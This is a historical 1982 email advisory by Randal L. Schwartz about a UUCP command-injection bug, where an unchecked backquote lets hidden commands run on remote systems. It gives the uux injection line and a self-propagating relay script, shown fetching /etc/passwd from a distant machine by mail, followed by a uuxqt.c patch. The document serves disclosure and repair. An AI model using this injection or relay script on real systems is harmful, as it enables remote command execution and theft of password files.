
		31) Security Bug, shell Special Characters

From: randals
Date: Thursday, 4 March 1982 at 0725-PST
In-real-life: Randal L. Schwartz
To: system
Cc: unixcomm
Subject: The information referred to in the UNIX wizards news

Here is my report on the bug in UUCP.  This is what I will be sending
out to the various systems upon request.  If you have any comments about
wording changes, or methods of distribution, please let me know.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			The problem
			~~~~~~~~~~~
Here is the method of attack for the UUCP security bug:
UUCP checks for vertical-bar, uparrow, and semicolon between
commands being executed, but left out the check for ONE thing...
the command expansion character, "open quote": `.

Using this, it is possible to execute a legal command, such as
"rmail", but drop in a hidden command, `/bin/sh`.  UUCP would
only check for the "rmail" being legal (which it is on all systems),
and forget about checking the /bin/sh stuff.

Now, all that one needed to do was feed "uux" stuff resembling the following:
	uux - sysname!rmail foo `/bin/sh` <<'EOF'
	(any command you wanted)
	(even more if you desired)
	EOF

and the commands would be executed on the remote "sysname".  The only
thing that appears in the log is "rmail foo `/bin/sh`", so it was
kinda detectable, but the actual commands escaped without being logged.

			Using the bug
			~~~~~~~~~~~~~
After I found the bug, I needed a command that would, in fact, replicate
itself on each system until it got to the right system, when it would finally
spring into action.  My solution was as follows:
	cd /tmp
	cat <<\EOF >.$$
	back=$1
	shift
	here=$1
	shift
	case $# in
		0)	: 'we are here!'
	(
	%%%%%%%%
	) 2>&1 | mail $back ;;
		*)	: 'yet another link to go'
			(
				echo "cd /tmp"
				echo "cat <<\EOF >.$$"
				cat $0
				echo "EOF"
				echo "sh .$$ $here!$back $*"
			) | uux - $1'!rmail foo `/bin/sh`'

	esac
	rm -f $0 ; : 'suicide in any case'
	EOF
	ed - .$$ <<ENDSCRIPT
	/^%%%%%%%%/c
	$1
	.
	w
	q
	ENDSCRIPT
	shift
	sh .$$ randals azure $*

One could simply pop this into a file (say "foo"), and enter:
	foo "cat /etc/passwd" tekmdp teklabs decvax chico research

and within a couple of days, the passwd file from the research machine
was mailed automatically to you.  (Obviously, the pathnames depend
on the source machine.)

			How to fix it
			~~~~~~~~~~~~~
In "uuxqt.c", around the 135th line, which looks something like this:
		cmdnok = 0;
		while ((ptr = getprm(ptr, prm)) != NULL) {
******			if (prm[0] == ';' || prm[0] == '^'
			  || prm[0] == '|') {
				xcmd[0] = '\0';
				APPCMD(prm);
				continue;
			}

add some code to the end of the starred line:
		|| prm[0] == '`'
to additionally check for the open quote.

I will be glad to answer further questions on this topic.

Randal L. Schwartz
Tektronix Microcomputer Development Products
Beaverton, Oregon
